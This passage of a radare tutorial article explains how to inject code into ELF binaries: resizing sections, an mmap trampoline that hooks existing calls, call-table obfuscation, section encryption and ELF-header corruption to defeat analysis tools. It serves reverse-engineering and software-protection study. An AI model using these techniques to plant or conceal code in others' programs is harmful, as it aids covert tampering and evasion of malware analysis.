+  Compilers usually pad functions with nop instructions to align the
+  following one. They are usually small, but sometimes they are big enough
+  to store trampolines that will help obfuscate the execution flow.
+
+  In the 'extending trampolines' chapter I will explain a technique to hide
+  function preludes inside a 'call trampoline' which runs the initial code
+  of each function and then jumps back to the next instruction.
+
+  By using call tables loaded in .data or memory it will be harder to follow
+  for the reverser, because the program can lose all function preludes and
+  footers so that it'll be read as a single blob.
+
+Compiler stubs:
+
+  Function preludes and calling conventions can be used as watermarks to
+  identify the compiler used. But when compiler optimizations are enabled
+  the generated code will be heavily transformed and those preludes will
+  probably be lost.
+
+  Some new versions of gcc are using a new function prelude aligning the
+  stack before entering the code to make memory access by the cpu on local
+  variables. But we can replace them with a shorter hand made one adapted
+  to the concrete function needs and this way ripping some more bytes for
+  our own fun.
+  
+  The entrypoint embeds a system dependent loader that acts as a launcher
+  for the constructor/main/destructor. We can analyze the constructor and
+  the destructor to check if they are void. 
+  
+  Then, we can drop all this code by just adding a branch to the main
+  pointer, getting about 190 bytes for a C program. You will probably find
+  much more unused code in programs written in D, C++, haskell or any other
+  high level language.
+
+  This is how a common gcc's entrypoint looks like:
+
+    0x08049a00, / xor ebp, ebp
+    0x08049a02  | pop esi
+    0x08049a03  | mov ecx, esp
+    0x08049a05  | and esp, 0xf0
+    0x08049a08, | push eax
+    0x08049a09  | push esp
+    0x08049a0a  | push edx
+    0x08049a0b  | push dword 0x805b630 ; sym.fini
+    0x08049a10, | push dword 0x805b640 ; sym.init
+    0x08049a15  | push ecx
+    0x08049a16  | push esi
+    0x08049a17  | push dword 0x804f4e0 ; sym.main
+    0x08049a1c, | call 0x80495b4  ; 1 = imp.__libc_start_main
+    0x08049a21  \ hlt 
+
+  By pushing 0's instead of fini/init pointers we can ignore the
+  constructor and destructor functions of the program, most of the programs
+  will work with no problems without them.
+
+  By analyzing code in both (sym.init and sym.fini) pointers we can 
+  determine the number of bytes:
+
+  [0x080482C0]> af @ sym.__libc_csu_fini~size
+  size = 4
+  [0x080482C0]> af @ sym.__libc_csu_init~size
+  size = 89
+
+Tracing
+
+  Execution traces are wonderful utilities to easily cleanup the view
+  of a binary by identifying parts of it as tasks or areas. We can for
+  example make a fast identification of the GUI code by starting a
+  trace and graphically clicking on all the menus and visual options
+  of the target application.
+
+  The most common problem to tracing is the low performance of a !stepall
+  operation, which mainly gets stupidly slow on loops, reps and tracing
+  already traced code blocks. To speedup this process, radare implements
+  a "touchtrace" method (available under the !tt command) which implements
+  an idea of MrGadix (thanks!)
+
+  This method consist in keeping a swapped copy of the targeted process
+  memory space on the debugger side and replacing it with
+  software breakpoint instructions. On intel we would use CC (aka int3).
+
+  Once the program runs, it raises an exception because of the trap
+  instruction, which is handled by the debugger. Then the debugger checks
+  if the instruction at %eip has been swapped and replaces the userspace
+  one, storing information about this step (like timestamp, number of times
+  it has been executed and step counter).
+
+  Once the instruction has been replaced, the debugger instructs the 
+  process to continue execution. Each time an unswapped instruction is 
+  executed the debugger replaces it.
+
+  At the end (giving an end-breakpoint) the debugger have a buffer with
+  enough information to determine the executed ranges. Using this easy 
+  method we can easily skip all the reps, loops and already analyzed
+  code blocks, speeding up the binary analysis.
+
+  Using the "at" command (which stands for analyze traces) it is possible
+  to take statistics or information about the traces and, for example..
+  serialize the program and unroll loops.
+
+  We can also use !trace, giving a certain debug level as numeric argument,
+  to log register changes, executed instructions, buffers, stack changes,
+  etc..
+  
+After these steps we can subtract the resulting ranges against the .text
+section and get how many bytes we can use to inject code.
+
+If the resulting space is not enough for our purposes we will have to face
+section resizing to put our code. This is explained later.
+
+Radare offers the "ar" (analyze ranges) command to manage range lists.
+It can perform addition, subtraction and boolean operations.
+
+  > ar+ 0x1000 0x1040 ; manual range addition
+  > ar+ 0x1020 0x1080 ; manual add with overlap
+  > ari   ; import traces from other places
+  .....
+  > .atr* ; import execution traces information
+  > .CF*  ; import function ranges
+  > .gr*  ; import code analysis graph ranges
+  .....
+  > ar    ; display non overlapped ranges
+  >       ; show booleaned ranges inside text section
+  > arb section._text section._text_end
+
+We can also import range information from external files or programs. One
+of the nicer characteristics of *nix is the ability to communicate
+applications using pipes by just making one program 'talk' in the other
+program language. So if we write a perl script that parses an IDA database
+(or IDC), we can extract the information we need and print radare commands
+('ar' in this case) to stdout, and then parsing the results with the '.'
+command.
+
+This time ar gives us information about the number of bytes that are
+theoretically not going to be executed and its ranges.
+
+We can now place some breakpoints on these locations to ensure we are not
+missing anything. Manual revision of the automated code analysis and
+tracing results is recommended.
+
+
+--[ 2.1 - Resolving register based branchs
+
+  The 'av' command provides subcommands to analyze opcodes inside
+  the native virtual machine.
+
+  The basic commands are: 'av-' to restart the vm state, 'avr' to manage
+  registers, 'ave' to evaluate VM expressions and 'avx' that will execute N
+  instructions from the current seek (will set the eip VM register to the
+  offset value).
+
+  Internally, the virtual machine engine translates instructions into
+  evaluable strings that are used to manipulate memory and change registers.
+
+  This simple concept allows to easily implement support for new
+  instructions or architectures.
+
+  Here is an example. The code analysis has reached a call instruction
+  addressing with a register. The code looks like:
+
+  /* --- */
+  $ cat callreg.S
+  .global main
+  .data
+  .long foo
+  .text
+  
+  foo:
+    ret
+  main:
+    xor %eax, %eax
+    mov $foo, %ebx
+    add %eax, %ebx
+    call *%ebx
+    ret
+
+  $ gcc callreg.S
+  $ radare -d ./a.out
+  ( ... )
+  [0xB7FC6810]> !cont sym.main
+  Continue until (sym.main) = 0x08048375
+  [0x08048375]> pd 5 @ sym.main
+  0x08048375  eip,sym.main:
+  0x08048375  / xor eax, eax
+  0x08048377 |  mov ebx, 0x8048374 ; sym.foo
+  0x0804837c,|  add ebx, eax
+  0x0804837e |  call ebx
+  0x08048380, \ ret 
+
+  [0x08048375]> avx 4
+  Emulating 4 opcodes
+  MMU: cached
+  Importing register values
+  0x08048375    eax ^= eax
+     ; eax ^= eax
+  0x08048377    ebx = 0x8048374 ; sym.foo
+     ; ebx = 0x8048374
+  0x0804837c,   ebx += eax
+     ; ebx += eax
+  0x0804837e   call ebx
+     ; esp=esp-4
+     ; [esp]=eip+2
+     ;==> [0xbf9be388] = 8048382  ((esp]))
+     ; write 8048382 @ 0xbf9be388
+     ; eip=ebx
+
+  [0x08048375]> avr eip
+  eip = 0x08048374
+
+At this point we can continue the code analysis where the 'eip'
+register of the virtual machine points.
+
+  [0x08048375]> .afr @ `avr eip~[2]`
+
+
+--[ 2.2 - Resizing data section
+
+There is no simple way to resize a section in radare1. This process is
+completely manual and tricky.
+
+In order to solve this limitation, radare2 provides a set of libraries
+(named libr) that reimplement all the functionalities of radare 1.x
+following a modular design instead of the old monolithic approach.
+
+Both branches of development are being done in parallel.
+
+Here is where radare2 api (libr) comes in action:
+
+ $ cat rs.c
+ #include <stdio.h>
+ #include <r_bin.h>
+ 
+ int main(int argc, char *argv[])
+ {
+   struct r_bin_t bin;
+   if (argc != 4) {
+     printf("Usage: %s <ELF file> <section> <size>\n", argv[0]);
+   } else {
+     r_bin_init(&bin);
+     if (!r_bin_open(&bin, argv[1], 1, NULL)) {
+       fprintf(stderr, "Cannot open '%s'.\n", argv[1]);
+     } else
+     if (!r_bin_resize_section(&bin, argv[2], r_num_math(NULL,argv[3]))) {
+       fprintf(stderr, "Cannot resize section.\n");
+     } else {
+       r_bin_close(&bin);
+       return 0;
+     }
+   }
+   return 1;
+ }
+
+ $ gcc -I/usr/include/libr -lr_bin rs.c -o rs
+
+ $ rabin -S my-target-elf | grep .data
+   idx=24 address=0x0805d0c0 offset=0x000150c0 size=00000484 \
+   align=0x00000020 privileges=-rw- name=.data
+
+ $ ./rs my-target-elf .data 0x9400
+
+ $ rabin -S my-target-elf | grep .data
+   idx=24 address=0x0805d0c0 offset=0x000150c0 size=00009400 \
+   align=0x00000020 privileges=-rw- name=.data
+
+Our 'rs' program will open a binary file (ELF 32/64, PE32/32+, ...) it will
+resolve a section named '.data' to change its size and will shift the rest
+of sections to keep the elf information as is.
+
+The reason for resizing the .data section is because this one is commonly
+linked after the text section. There will be no need to reanalyze the
+program code to rebase all the data accesses to the new address.
+
+The target program should keep working after the section resizing and we
+already know which places in the program can be used to inject our
+trampoline.
+
+   +-------+    +-------+
+   | .text |    | .text |
+   |       |    |       | <-- inject trampoline
+   |-------| -> |-------|
+   | .data |    | .data |
+   +-------+    |       | <-- inject new code or data
+                |       |
+                +-------+
+
+Next chapters will explain multiple trampoline methods that will use our
+resized data section to store pointer tables or new code.
+
+
+--[ 2.3 - Basics on code injection
+
+Self modifying code is a nice thing, but usually a dangerous task too. Also
+patches/tools like SElinux will not let us to write to an already
+executable section.
+
+To avoid this problem we can change in the ELF headers the .text perms to
+writable but not executable, and include our decryption function in a new
+executable section. When the decryption process is done, it will have to
+change text perms to executable and then transfer control to it.
+
+In order to add multiple nested encryption layers the task will be harder
+mostly because of the relocation problems, and if the program is not
+PIC-ed, rebasing an entire application on the fly by allocating and copying
+the program multiple times in memory can be quite complicated.
+
+The simplest implementation consists in these steps:
+
+ - Define from/to ranges
+ - Define cipher key and algorithm
+ - Inject deciphering code in the entrypoint
+   - We will need to use mprotect before looping
+ - Statically cipher the section
+
+The from/to addresses can be hardcoded in the assembly snippet or written
+in .data or somewhere for later. We can also ask the user for a key and
+make the binary work only with a password.
+
+If the encryption key is not found in the binary, the unpacking process
+becomes harder, and we will have to implement a dynamic method to find the
+correct one. This will be explained later.
+
+Another way to define ranges is by using watermarks and let our injected 
+code walk over the memory looking for these marks.
+
+The last step is probably the easier one. We already know the key and the
+algorithm, its time to rewrite the inverse one using radare commands and
+let the script run over these ranges.
+
+This is an example:
+
+The 'wo' command is a subcommand of the 'w' (write) which offers arithmetic
+write operations over the current block.
+
+  [0x00000000]> wo?
+  Usage: wo[xrlasmd] [hexpairs]
+  Example: wox 90    ; xor cur block with 90
+  Example: woa 02 03 ; add 2, 3 to all bytes of cur block
+  Supported operations:
+    woa  addition        +=
+    wos  subtraction     -=
+    wom  multiply        *=
+    wod  divide          /=
+    wox  xor             ^=
+    woo  or              |=
+    woA  and             &=
+    wor  shift right    >>=
+    wol  shift left     <<=
+
+It uses cyclic hexpair byte arrays as arguments. Just by seeking on the
+"from" address and setting blocksize as "to-from" we will be ready to type
+the 'wo' ones.
+
+Implementing this process in macros will make the code more maintainable
+and easy to manage. The understanding of functional programming is good
+for writing radare macros, split the code in small functions doing
+minimal tasks and make them interact with each other.
+
+Macros are defined like in lisp, but syntax is really closer to a mix
+between perl and brainfuck. Don't get scary at first instance..it doesn't
+hurt as much as you can think and the resulting code is funnier than
+expected ;)
+
+  (cipher from to key
+    s $0
+    b $1-$0
+    woa $2
+    wox $2)
+
+We can put it in a single line (by replacing newlines with commas ',')
+and put it in our ~/.radarerc:
+
+(cipher from to key,s $0,b $1-$0,woa $2,wox $2,)
+
+Now we can call this macro at any time by just prepending a dot before the
+parenthesis and feeding it with the arguments.
+
+  f from @ 0x1200
+  f to @ 0x9000
+  .(cipher from to 2970)
+
+To ease the code injection we can write a macro like this:
+
+ (inject hookaddr file addr
+    wa call $2 @ $0
+    wf $1 @ $2)
+
+Feeding this macro with the proper values will assemble a call opcode
+branching to the place where we inject our code (addr or $2) stored in the
+'file' or $1.
+
+Radare has the expanded AES key searching algorithm developed by Victor
+Mu~noz. It can be helpful while reversing a program that uses this kind of
+ciphering algorithm. As the IO is abstracted it is possible to launch this
+search against files, program memory, ram dumps, etc..
+
+For example:
+
+  $ radare -u /dev/mem
+  [0x00000000]> /a
+  ...
+
+WARNING: Most current GNU/Linux distributions comes with the kernel
+compiled with the CONFIG_STRICT_DEVMEM option which restricts the access
+of /dev/mem to the only first 1.1M.
+
+All write operations are stored in a linked list of backups with the
+removed contents. This make possible to undo and redo all changes done
+directly on file. This allows you to try different modifications on the
+binary without having to restore manually the original one.
+
+These changes can be diffed later with the "radiff -r" command. The command
+performs a deltified binary diff between two files, The '-r' displays the
+result of the operation as radare commands that transforming the first
+binary into the second one.
+
+The output can be piped to a file and used later from radare to patch it
+at runtime or statically.
+
+For example:
+
+  $ cp /bin/true true
+  $ radare -w true
+  [0x08048AE0]> wa xor eax,eax;inc eax;xor ebx,ebx;int 0x80 @ entrypoint
+  
+  [0x08048AE0]> u
+  03 + 2 00000ae0: 31 ed => 31 c0 
+  02 + 1 00000ae2: 5e => 40 
+  01 + 2 00000ae3: 89 e1 => 31 db 
+  00 + 2 00000ae5: 83 e4 => cd 80 
+  
+  [0x08048AE0]> u* | tee true.patch
+  wx 31 c0 @ 0x00000ae0
+  wx 40 @ 0x00000ae2
+  wx 31 db @ 0x00000ae3
+  wx cd 80 @ 0x00000ae5
+
+The 'u' command is used to 'undo' write operations. Appending the '*' we
+force the 'u' command to list the write changes as radare commands, and we
+pipe the output to the 'tee' unix program.
+
+Let's generate the diff:
+
+  $ radiff -r /bin/true true 
+  e file.insertblock=false
+  e file.insert=false
+  wx c0 @ 0xae1
+  wx 40 @ 0xae2
+  wx 31 @ 0xae3
+  wx db @ 0xae4
+  wx cd @ 0xae5
+  wx 80 @ 0xae6
+
+This output can be piped into radare through stdin or using the '.'
+command to interpret the contents of a file or the output of a command.
+
+  [0x08048AE0]> . radiff.patch
+  or
+  [0x08048AE0]> .!!radiff -r /bin/true $FILE
+
+The '$FILE' environment is exported to the shell from inside radare as well
+as other variables like $BLOCK, $BYTES, $ENDIAN, $SIZE, $ARCH, $BADDR, ...
+
+Note that in radare there's not really much difference between memory
+addresses and on-disk ones because the virtual addresses are emulated by
+the IO layer thanks to the io.vaddr and io.paddr variables which are used
+to define the virtual and physical addresses for a section or for the whole
+file.
+
+The 'S' command is used to configure a fine-grained setup of virtual and
+physical addressing rules for ranged sections of offsets.
+
+Do not care too much about it because 'rabin' will configure these
+variables at startup when the file.id eval variable is true.
+
+
+--[ 2.4 - Mmap trampoline
+
+The problem faced when resizing the .text section is that .data section is
+shifted, and the program will try to access it absolutely or relatively.
+
+This situation forces us to rebase all the text section and adapt the rest of
+sections.
+
+The problem is that we need a deep code analysis to rebase and this is
+something that we will probably do wrong if we try to do only a static code
+analysis.  This situation usually require a complex dynamic, and sometimes
+manual, analysis to fix all the possible pointers.
+
+To skip this issue we can just resize the .data section which is after the
+.text one and just write a trampoline in the .text section loading code
+from .data and putting it in memory using mmap.
+
+The decision to use mmap is because is the only way to get executable pages
+with write permissions in memory even with SELinux enabled.
+
+The C code looks like this:
+
+---------------------8<--------------------------
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+
+int run_code(const char *buf, int len)
+{
+  unsigned char *ptr;
+  int (*fun)();
+  ptr = mmap(NULL, len,
+      PROT_EXEC | PROT_READ | PROT_WRITE,
+      MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+  if (ptr == NULL)
+    return -1;
+  fun = (int(*)(void))ptr;
+  memcpy(ptr, buf, len);
+  mprotect(ptr, len, PROT_READ | PROT_EXEC);
+  return fun();
+}
+
+int main()
+{
+  unsigned char trap = 0xcc;
+  return run_code(&trap, 1);
+}
+---------------------8<--------------------------
+
+The manual rewrite in assembly become:
+
+---------------------8<--------------------------
+.global main
+.global run_code
+.data
+
+retaddr: .long 0
+shellcode: .byte 0xcc
+hello: .string "Hello World\n"
+
+.text
+tailcall:
+	push %ebp
+	mov %esp, %ebp
+	push $hello
+	call printf
+	addl $4, %esp
+	pop %ebp
+	ret
+
+run_code:
+	pop (retaddr)
+	/* lcall *0 */
+	call tailcall
+	push (retaddr)
+
+	/* our snippet */
+	push %ebp
+	mov %esp, %ebp
+	pusha
+
+	push %ebp
+	xor %ebp, %ebp   /* 0 */
+	mov $-1, %edi    /* -1 */
+	mov $0x22, %esi  /* MAP_ANONYMOUS | MAP_PRIVATE */
+	mov $7, %edx     /* PROT_EXEC | PROT_READ | PROT_WRITE */
+	mov $4096, %ecx  /* len = 4096 */
+	xor %ebx, %ebx   /* 0 */
+	mov $192, %eax   /* mmap2 */
+	int $0x80
+	pop %ebp
+
+	mov %eax, %edi       /* dest pointer */
+	mov 0x8(%ebp), %esi  /* get buf  (arg0) */
+	mov $128, %ecx
+	cld
+	rep movsb
+	mov %eax, %edi
+
+	mov $5, %edx     /* R-X */
+	mov $4096, %ecx  /* len */
+	mov %edi, %ebx   /* addr */
+	mov $125, %eax   /* mprotect */
+	int $0x80
+
+	call *%edi
+	popa
+	pop %ebp
+	ret
+
+main:
+	push $shellcode
+	call run_code
+	add $4, %esp
+	ret
+---------------------8<--------------------------
+
+Running this little program will result on a trap instruction executed on the
+mmaped area. I decided to do not checks on return values to make the code
+smaller.
+
+  $ gcc rc.S
+  $ ./a.out
+  Hello World
+  Trace/breakpoint trap
+
+  The size in bytes of this code can be measured with this line in the shell:
+
+  $ echo $((`rabin -o d/s a.out |grep run_code|cut -d ' ' -f 2 |wc -c`/2))
+  76
+
+This graph explains the layout of the patch required
+
+                         +----+   /  push dword csu_fini
+         .---------------| EP | <    push dword csu_init
+         |               +----+   \  push dword main
+         V                v
+    +------------+     +--------+
+    |  csu_init  |     |  main  |   /  push 0x80483490
+    |------------|     |--------| <    call getopt
+    |    mmap    |   .-|   ...  |   \  mov [esp+30], eax
+    | trampoline |   | |        |
+    +------------+   | +--------+                   .-----------------.
+        ||'||        |                              | this code needs |
+        |   |- - - - |- - - - - - - - - - - - - -. <  the mmap tramp  |
+        :          __|___       +-----------+    .  | to be executed  |
+        .         / hook \ ---> | mmap code |    .  `-----------------'
+        .         \getopt/      +-----------+    .
+         - - - - - - - - - - - - - -|- - - - - - '
+                                    |
+                  +--------+        / fall to the getopt flow
+                  | getopt | <-----'
+                  +--------+
+                      |
+                    (ret)
+
+
+The injection process consists on the following steps:
+
+ * Resize the .data section to get enought space for our code
+
+    f newsize @ section._data_end - section._data + 4096
+    !rabin2 -o r/.data/`?v newsize` $FILE
+    q!
+
+ * Write the code at the end of the unresized .data section
+
+    !!gcc our-code.c
+    "!!rabin a.out -o d/s a.out | grep ^main | cut -d ' ' -f 2 > inj.bytes"
+    wF inj.bytes @ section._data_end
+
+ * Null the __libc_csu_init pointer at entrypoint (2nd push dword)
+
+    e asm.profile=simple
+    s entrypoint
+    wa push 0 @ `pd 20~push dword[0]#1`
+
+ * Inject the mmap loader at symbol __libc_csu_init
+
+    # generate mmap.bytes with the mmap trampoline
+    !!gcc mmap-tramp.S
+    "!!rabin a.out -o d/s a.out | grep ^main | cut -d ' ' -f 2 > mmap.bytes"
+    # write hexpair bytes contained in mmap.bytes file at csu_init
+    wF mmap.bytes @ sym.__libc_csu_init
+
+ * Hook a call instruction to bridge the execution of our injected code
+   and continue the original call workflow.
+
+    - Determine the address of the call to the target symbol to be hooked.
+      For example. Having 'ping' program, this script will determine an
+      xref to the getopt import PLT entry.
+
+        s entrypoint
+        # seek to the third push dword in the entry point (main)
+        s `pd 20~push dword[3]#2`
+
+        # Analyze function: the '.' will interpret the output of the command
+	# 'af*' that prints radare commands registering xrefs, variable
+        # accesses, stack frame changes, etc.
+        .af*
+
+	# generate a file named 'xrefs' containing the code references
+        # to the getopt symbol. 
+        Cx~`?v imp.getopt`[1] > xrefs
+
+        # create an eNumerate flag at every offset specified in 'xrefs' file
+        fN calladdr @@.xrefs
+
+    - Create a proxy hook to bridge execution without destroying the stack.
+
+      This is explained in the following lines.
+
+    - Change the call of the hook to our proxy function
+
+        # write assembly code 'call <addr>'
+        # quotes will replace the inner string with the result of the
+        # command ?v which prints the hexadecimal value of the given expr.
+        wa call `?v dstaddr`
+
+    - Profit
+
+Here is an example assembly code that demonstrates the functionality of the
+trampoline for the patched call. This snippet of code can be injected after
+the mmap trampoline.
+
+----------8<-----------
+.global main
+
+trampoline:
+  push $hookstr
+  call puts
+  add $4, %esp
+  jmp puts
+
+main:
+  push $hello
+  call trampoline
+  add $4, %esp
+  ret
+
+.data
+
+hello:
+  .string "hello world"
+hookstr:
+  .string "hook!"
+----------8<-----------
+
+The previous code cannot be injected directly in the binary, and one of the
+main conceptual reasons is that the destination address of the trampoline
+will be defined at runtime, when the mmapped region of the data section is
+ready with executable permissions, the destination address must be stored
+somewhere in the data section.
+
+
+--[ 2.4.1 - Call trampoline
+
+Once the holes have been identified we can now modify some parts of the
+program to obfuscate the control flow, symbol access, function calls and
+inlined syscalls in different ways.
+
+To walk through the program code blocks we can use iterators or nested
+iterators to run from simple to complex scripted code analysis engines and
+retrieve or manipulate the program by changing instructions or moving code.
+
+The control flow of the program can be obfuscated by adding a calltable
+trampoline for calling functions. We will have to patch the calls and store
+the jump addresses in a table in the data section.
+
+The same hack can be done for long jumps by placing a different trampoline
+to drop the stacked eip and use jumps instead of calls.
+
+Iterators in radare can be implemented as macros appending the macro call
+after the @@ foreach mark.
+
+ For example: "x @ 0x200"
+ will temporally seek to 0x200 and run the "x" command.
+
+ Using: "x @@ .(iterate-functions)"
+ will run the iterator macro at every address returned by the macro.
+
+To return values from a macro we can use the null macro body and append the
+resulting offset. If no value is given, null is returned and the iterator
+will stop.
+
+Heres the implementation for the function-iterator:
+
+  "(iterate-functions,()CF~#$@,)"
+
+We can also use the search engine with cmd.hit eval variable to run a
+command when a search hit is found. Obviously, the command can be a macro
+or a script file in any language.
+
+  e cmd.hit=ar- $$ $$+5
+  /x xx yy zz
+
+But we can also do it after processing the search by just removing the
+false positive hits and running a foreach command.
+
+  # configure and perform search
+  e search.from=section._text
+  e search.to=section._text_end
+  e cmd.search=
+  /x xx yy zz
+
+  # filtering hit results
+  fs search     ; enter into the search flagspace
+  f             ; list flags in search space
+  f -hit0_3     ; remove hit #3
+  # write on every filtered hit
+  wx 909090 @@ hit*
+
+Flagspaces are groups of flags. Some of them are automatically created by
+rabin while identifying strings, symbols, sections, etc, and others are
+updated at runtime like by commands like 'regs' (registers) or 'search'
+(search results).
+
+You can switch to or create another flagspace using the 'fs' command. When
+a flagspace is selected the 'f' command will only show the flags in the
+current flagspace. 'fs *' is used to enable all flagspaces at the same time
+(global view). See fs? for extended help.
+
+The internal metadata database can be managed with the C command and stores
+information about code and data xrefs, comments, function definitions,
+type, data conversions and structure definitions to be used by the
+disassembler engine, the code analysis module and user defined scripts.
+
+Data and code xrefs are very useful reference points while reverse
+engineering.  It is interesting to obfuscate them all as much as possible
+to fool code analysis engines, forcing the reverser to use runtime or
+emulated environments to determine when a string or a buffer is used.
+
+To analyze a function in radare is preferably to go into Visual mode with
+command 'V', and then press the keys "d" and "f".
+
+This action will make a code analysis from the current seek or where the
+cursor points (if in cursor mode, toggleable with the lowercase "c" key in
+Visual mode). This code analysis will define multiple things like argument,
+local and global variable accesses, feeding the database with xref
+information that can be later used to determine which points of the program
+are using a certain pointer.
+
+By defining few eval vars in your ~/.radarerc most of this basic code
+analysis will be done by default.
+
+  $ cat ~/.radarerc
+  e file.id=true    ; identify file type and set arch/baddr...
+  e file.analyze=true ; perform basic code analysis at startup
+  e file.flag=true  ; add basic flags
+  e scr.color=true  ; use color screen
+
+NOTE: By passing the '-n' parameter to radare the startup process will skip
+the interpretation of .radarerc.
+
+All this information can be cached, manipulated and restored using project
+files (with the -P program flag at startup or enabling this feature in
+runtime with the 'P' command).
+
+After this parenthesis we continue obfuscating the xrefs to make reversers
+life funnier.
+
+One simple way to do this would be to create an initialization code,
+copying some pointers required by the program to run at random mmaped
+addresses and defining a way to transform these accesses into a sequence
+jigsaw. This can be achieved turning each pointer "random" based on some
+rules like a shifted array accessed by a mod.
+
+  # calltable initializer
+  (ct-init tramp ctable ctable_end
+    f trampoline @ $0
+    f calltable @ $1
+    f calltable_ptr @ calltable
+    wf trampoline.bin @ trampoline
+    b $2-$1
+    wb 00 ; fill calltable with nops
+    )
+
+  ; calltable adder
+  (ct-add
+    ; check if addr is a long call
+    ? [1:$$]==0xeb
+    ?!()
+    ; check if already patched
+    ? [4:$$+1]==trampoline
+    ??()
+    wv $$+5 @ calltable_ptr
+    yt 4 calltable_ptr+4 @ $$+1
+    f calltable_ptr @ calltable_ptr+8
+    wv trampoline @ $$+1
+    )
+
+We can either create a third helper macro that automatically iterates over
+every long call instruction in .text and running ct-add on it.
+
+  (ct-run from to tramp ctable ctable_end
+    .(ct-init tramp ctable ctable_end)
+    s from
+    loop:
+      ? [1:$$]==0xeb
+      ?? .(ct-add)
+      s +$$$
+    ? $$ < to
+    ??.loop:
+    )
+
+Or we can also write a more fine-grained macro to walk over the function
+
+  e asm.profile=simple
+  pD~call[0] > jmps
+  .(ct-init 0x8048000 0x8048200)
+  .(ct-add)@@.jmps
+
+The trampoline.bin file will be something like this:
+
+---------------------------------------------------------------
+/*
+ * Calltable trampoline example // --pancake
+ * ---------------------------------------------------
+ * $ gcc calltrampoline.S -DCTT=0x8048000 -DCTT_SZ 100
+ */
+
+#ifndef CTT_SZ
+#define CTT_SZ 100
+#endif
+#ifndef CTT
+#define CTT call_trampoline_table
+#endif
+
+.text
+.global call_trampoline
+.global main
+
+main:
+ /* */
+ call ct_init
+ call ct_test
+ /* */
+ pushl $hello
+ call puts
+ add $4, %esp
+ ret
+
+call_trampoline:
+ pop %esi
+ leal CTT, %edi
+ movl %esi, 0(%edi)      /* store ret addr in ctable[0] */
+ 0:
+ add $8, %edi
+ cmpl 0(%edi), %esi      /* check ret addr against ctable*/
+ jnz 0b
+ movl 4(%edi), %edi      /* get real pointer */
+ call *%edi              /* call real pointer */
+ jmp *CTT                /* back to caller */
+
+/* initialize calltable */
+ct_init:
+ leal CTT+8, %edi
+ movl $retaddr, 0(%edi)
+ movl $puts, 4(%edi)
+ ret
+
+/* hello world using the calltable */
+ct_test:
+ push $hello
+ call call_trampoline
+retaddr:
+ add $4, %esp
+ ret
+	
+.data
+hello:
+ .string "Hello World"
+
+call_trampoline_table:
+ .fill 8*(CTT_SZ+1), 1, 0x00
+---------------------------------------------------------------
+
+Note that this trampoline implementation is not thread safe. If two threads
+are use the same trampoline call table at the same time to temporally store
+the return address, the application will crash.
+
+To fix this issue you should use the %gs segment explained in the 'syscall
+obfuscation' chapter. But to avoid complexity no thread support will be
+added at this moment.
+
+To inject the shellcode into the binary we will have to make some space in
+the .data segment for the calltable. We can do this with gcc -D:
+
+  [0x8048400]> !!gcc calltrampoline.S -DCTT=0x8048000 -DCTT_SZ=100
+  > !! rabin -o d/s a.out|grep call_trampoline|cut -d : -f 2 > tramp.hex
+  > wF tramp.hex @ trampoline_addr
+
+
+--[ 2.4.2 - Extending trampolines
+
+We can take some real code from the target program and move it into the
+.data section encrypted with a random key. Then we can extend the call
+trampoline to run an initialization function before running the function.
+
+Our call trampoline extension will cover three points:
+
+ - Function prelude obfuscation - Function mmaping (loading code from data)
+ - Unciphering and checksumming
+
+At the same time we can re-encrypt the function again after calling the end
+point address. This will be good for our protector because the reverser
+will be forced to manually step into the code because no software
+breakpoints will be able to be used on this code because they will be
+re-encrypted and the checksumming will fail.
+
+To do this we need to extend our call trampoline table or just add another
+field in the call trampoline table specifying the status of the destination
+code (if it is encrypted or not) and optionally the checksum.
+
+The article aims to explain guidelines and possibilities when playing with
+binaries. But we are not going to implement such kind of extensions to
+avoid enlarge too much this article explaining these advanced techniques.
+
+The 'p' command is used to print the bytes in multiple formats, the more
+powerful print format is 'pm' which permits to describe memory contents
+using a format-string like string and name each of the fields.
+
+When the format-string starts with a numeric value it is handled as an
+array of structures. The 'am' command manages a list of named 'pm' commands
+to ease the re-use of structure signatures along the execution of radare.
+
+We will start introducing this command describing the format of an entry of
+our trampoline call table:
+
+  [0x08049AD0]> pm XX
+  0x00001ad0 = 0x895eed31
+  0x00001ad4 = 0xf0e483e1
+
+Now adding the name of fields:
+
+  [0x08049AD0]> pm XX from to
+        from : 0x00001ad0 = 0x895eed31
+          to : 0x00001ad4 = 0xf0e483e1
+
+And now printing a readable array of structures:
+
+  [0x08049AD0]> pm 3XX from to
+  0x00001ad0 [0] {
+        from : 0x00001ad0 = 0x895eed31
+          to : 0x00001ad4 = 0xf0e483e1
+  }
+  0x00001ad8 [1] {
+        from : 0x00001ad8 = 0x68525450
+          to : 0x00001adc = 0x0805b6a0
+  }
+  0x00001ae0 [2] {
+        from : 0x00001ae0 = 0x05b6b068
+          to : 0x00001ae4 = 0x68565108
+  }
+
+There is another command named 'ad' that stands for 'analyze data'. It
+automatically analyzes the contents of the memory (starting from the
+current seek) looking for recognized pointers (following the configured
+endianness), strings, pointers to strings, and more.
+
+The easiest way to see how this command works is by starting a program in
+debugger mode (f.ex: radare -d ls) and running 'ad@esp'.
+
+The command will walk through the stack contents identifying pointers to
+environment variables, function pointers, etc..
+
+Internal grep '~' syntax sugar can be used to retrieve specific fields of
+structures for scripting, displaying or analysis.
+
+  # register a 'pm' in the 'am' command
+  [0x08048000]> am foo 3XX from to
+
+  # grep for the rows matching 'from'
+  [0x08048000]> am foo~from
+          from : 0x00001ad0 = 0x895eed31
+          from : 0x00001ad8 = 0x68525450
+          from : 0x00001ae0 = 0x05b6b068
+
+  # grep for the 4th column
+  [0x08048000]> am foo~from[4]
+  0x895eed31
+  0x68525450
+  0x05b6b068
+
+  # grep for the first row
+  [0x08048000]> am foo~from[4]#0
+  0x895eed31
+
+
+--[ 3 - Protections and manipulations
+
+This chapter will face different manipulations that can be done on binaries
+to add some layers of protections to make reverse engineering on the target
+binaries a more complicated.
+
+
+--[ 3.1 - Trashing the ELF header
+
+Corrupting the ELF header is another possible target of a packer for making
+the reverser's life little harder.
+
+Just modifying one byte in the ELF header becomes a problem for tools like
+gdb, ltrace, objdump, ... The reason is that they depend on section headers
+to get information about sections, symbols, library dependencies, etc...
+and if they are not able to parse them they just stop with an error. At the
+moment of writing, only IDA and radare are able to bypass this issue.
+
+This can be easily done in this way:
+
+ $ echo wx 99 @ 0x21 | radare -nw a.out
+
+A reverser can use the fix-shoff.rs (included in the scripts) directory in
+the radare sources, to reconstruct the 'e_sh_off' dword in the ELF header.
+
